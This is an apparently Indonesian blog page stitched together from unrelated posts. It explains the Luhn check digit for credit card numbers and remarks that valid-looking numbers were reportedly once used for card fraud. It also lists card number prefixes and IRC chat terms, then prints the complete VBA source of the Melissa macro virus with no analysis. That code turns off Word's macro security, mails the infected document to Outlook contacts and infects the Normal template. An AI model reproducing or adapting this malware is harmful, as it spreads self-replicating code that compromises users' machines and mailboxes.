1. untuk setiap digit pada posisi yang ganjil (saya menghitung digit mulai dari kiri dengan yang paling kiri adalah digit ke-1), kalikan nilainya dengan dua, jika hasilnya lebih dari 9, kurangi hasilnya dengan 9. Jumlahkan semua angka yang telah didapat itu.
2. untuk setiap digit pada posisi genap, jumlahkan semua nilainya dan tambahkan hasilnya dengan hasil langkah pertama.
3. jika hasil pada langkah kedua habis dibagi 10, berarti nomor kartu tersebut sah.

Mudah bukan?, untuk kartu dengan jumlah digit yang ganjil (misalnya Visa [13 digit], Amex [15 digit]) caranya sama, hanya saja pada langkah pertama yang dikalikan adalah digit pada posisi genap, dan pada langkah kedua yang dijumlahkan adalah digit pada posisi ganjil.

Algoritma Cek Digit Luhn

Contoh :
Jika saya punya kartu dengan nomor :

7889-8594-5435-5413

dan saya ingin tahu apakah angka ini benar-benar nomor kartu kredit yang sah atau tidak saya bisa melakukan langkah sbb (perhatikan jumlah digit ada 16):

1) mengalikan semua angka pada digit ganjil dengan dua dan mengurangkan hasilnya dengan 9 jika lebih dari 9, lalu dijumlahkan

inilah digit-digit pada posisi ganjil

D01 = 7
D03 = 8
D05 = 8
D07 = 9
D09 = 5
D11 = 3
D13 = 5
D15 = 1

Jika dilakukan operasi kali dua dan kurangi 9 (jika lebih dari 9) didapat

D01' = 7 x 2 = 14, karena lebih dari maka hasilnya dikurangi 9 D02' = 14 - 9 = 5
D03' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D05' = 8 x 2 = 16, karena lebih dari maka hasilnya dikurangi 9 D02' = 16 - 9 = 7
D07' = 9 x 2 = 18, karena lebih dari maka hasilnya dikurangi 9 D02' = 18 - 9 = 9
D09' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D11' = 3 x 2 = 6 , kurang dari 9 jadi tetap 6
D13' = 5 x 2 = 10, karena lebih dari maka hasilnya dikurangi 9 D02' = 10 - 9 = 1
D15' = 1 x 2 = 2 , kurang dari 9 jadi tetap 2

Jumlah D01' + D03' + D05' + D07' + D09' + D11' + D13' + D15' = 5 + 7 + 7 + 9 + 1 + 6 + 1 + 2 = 38

2) Menjumlahkan semua digit pada posisi genap

D02 = 8
D04 = 9
D06 = 5
D08 = 4
D10 = 4
D12 = 5
D14 = 4
D16 = 3

Jumlah = 8 + 9 + 5 + 4 + 4 + 5 + 4 + 3 = 42

Bila hasil langkah 1 dan langkah 2 dijumlahkan didapat 38 + 42 = 80, karena 80 habis dibagi 10 maka nomor tersebut sah sebagai nomor kartu kredit.

Sudah jelas kan?, ternyata algoritma cek digit pada kartu kredit sangat mudah dilakukan Anda pun bisa menghasilkan nomor-nomor yang sah sebagai nomor kartu kredit dengan menggunakan program, dan katanya dulu ini bisa dipakai untuk melakukan credit card fraud saya sendiri masih kurang mengerti dengan caranya karena menurut saya sekarang ini pemeriksaan sudah jauh lebih ketat dan hampir tidak mungkin seseorang lolos dengan hanya berbekal nomor yang sah saja tanpa expiration date dan nama pemiliknya.

Prefix Panjang nomor Jenis Kartu
1800 15 JCB
2131 15 JCB
300 14 Diners
301 14 Diners
302 14 Diners
303 14 Diners
304 14 Diners
305 14 Diners
34 15 Amex
36 14 Diners
37 15 Amex
38 14 Diners
3 16 JCB
4 13/16 Visa
51 16 MasterCard
52 16 MasterCard
53 16 MasterCard
54 16 MasterCard
55 16 MasterCard
56 16 Bankcard
6011 16 Discover

Beberapa istilah dalam chatting

Net splits
Network dapat menjadi terpecah (disebut "net split"), jadi memisahkan anda dari user-user yang sedang berbicara dengan anda. Split ini sering terjadi cukup singkat, walau kadang sampai beberapa hari.

Lag
Problem yang sering muncul adalah "lag", dimana ada delay yang terasa antara waktu ketika anda mengetikkan pesan dan sampai orang lain membacanya. Pilihlah server terdekat dengan kita untuk mengurangi lag. Lag dapat diukur dengan menggunakan perintah /ping (lihat bagian perintah-perintah di atas). Perintah untuk berpindah server adalah /server nama.server.tsb.

Server List
Pada banyak client, mengetikkan /links memberikan list dari server-server pada net yang bersangkutan. Gunakan perintah ini secara sparing, tidak lebih dari beberapa kali dalam satu baris.

Ping? Pong!
Untuk user mIRC : Ping? Pong! Dalam window status berarti server anda mem"ping" anda untuk memastikan bahwa anda masih terkoneksi, dan client anda otomatis membalas dengan pong. Tidak usah khawatir dengan hal ini.

Peringatan tentang DCC chat

Perintah /dcc chat dapat digunakan untuk membuka koneksi one-to-one yang menghindarkan dari lagi dan tidak akan diputuskan oleh net split. Periksalah dokumentasi client anda untuk petunjuk penggunaan. Pada client-client yang umum, anda dapat menset koneksi DCC chat dengan sekaligus mengetikkan /dcc chat nick_dari_orang_lain. Untuk berbicara melalui koneksi itu, ketik /msg =nick apa saja (perhatikan tanda =). Dalam mIRC, anda dapat juga memulai sesi DCC chat dengan memilih DCC dan kemudian Chat dari menu dan kemudian memasukkan nick dari user yang ingin kita ajak berbicara. Sebuah window akan terbuka untuk sesi dcc chat tersebut.

Virus Mellisa ( Source Code )

Private Sub AutoOpen() 
On Error Resume Next 
p$ = "clone" 
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then 
CommandBars("Macro").Controls("Security...").Enabled = False 
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& 
Else 
p$ = "clone" 
CommandBars("Tools").Controls("Macro").Enabled = False 
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) 
End If 
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice 
Set UngaDasOutlook = CreateObject("Outlook.Application") 
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") 
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then 
If UngaDasOutlook = "Outlook" Then 
DasMapiName.Logon "profile", "password" 
For y = 1 To DasMapiName.AddressLists.Count 
Set AddyBook = DasMapiName.AddressLists(y) 
x = 1 
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) 
For oo = 1 To AddyBook.AddressEntries.Count 
Peep = AddyBook.AddressEntries(x) 
BreakUmOffASlice.Recipients.Add Peep 
x = x + 1 
If x > 50 Then oo = AddyBook.AddressEntries.Count 
Next oo 
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName 
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" 
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName 
BreakUmOffASlice.Send 
Peep = "" 
Next y 
DasMapiName.Logoff 
End If 
p$ = "clone" 
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" 
End If 
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) 
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) 
NTCL = NTI1.CodeModule.CountOfLines 
ADCL = ADI1.CodeModule.CountOfLines 
BGN = 2 
If ADI1.Name <> "Melissa" Then 
If ADCL > 0 Then _ 
ADI1.CodeModule.DeleteLines 1, ADCL 
Set ToInfect = ADI1 
ADI1.Name = "Melissa" 
DoAD = True 
End If 
If NTI1.Name <> "Melissa" Then 
If NTCL > 0 Then _ 
NTI1.CodeModule.DeleteLines 1, NTCL 
Set ToInfect = NTI1 
NTI1.Name = "Melissa" 
DoNT = True 
End If 
If DoNT <> True And DoAD <> True Then GoTo CYA 
If DoNT = True Then 
Do While ADI1.CodeModule.Lines(1, 1) = "" 
ADI1.CodeModule.DeleteLines 1 
Loop 
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") 
Do While ADI1.CodeModule.Lines(BGN, 1) <> "" 
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) 
BGN = BGN + 1 
Loop 
End If 
p$ = "clone" 
If DoAD = True Then 
Do While NTI1.CodeModule.Lines(1, 1) = "" 
NTI1.CodeModule.DeleteLines 1 
Loop 
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") 
Do While NTI1.CodeModule.Lines(BGN, 1) <> "" 
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) 
BGN = BGN + 1 
Loop 
End If 
CYA: 
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then 
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName 
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then 
ActiveDocument.Saved = True: End If 
'WORD/Melissa written by Kwyjibo 
'Clone written by Duke/SMF 
'Works in both Word 2000 and Word 97 
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! 
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." 
End Sub

 
Design by Wordpress Themes | Bloggerized by Free Blogger Templates | Macys Printable Coupons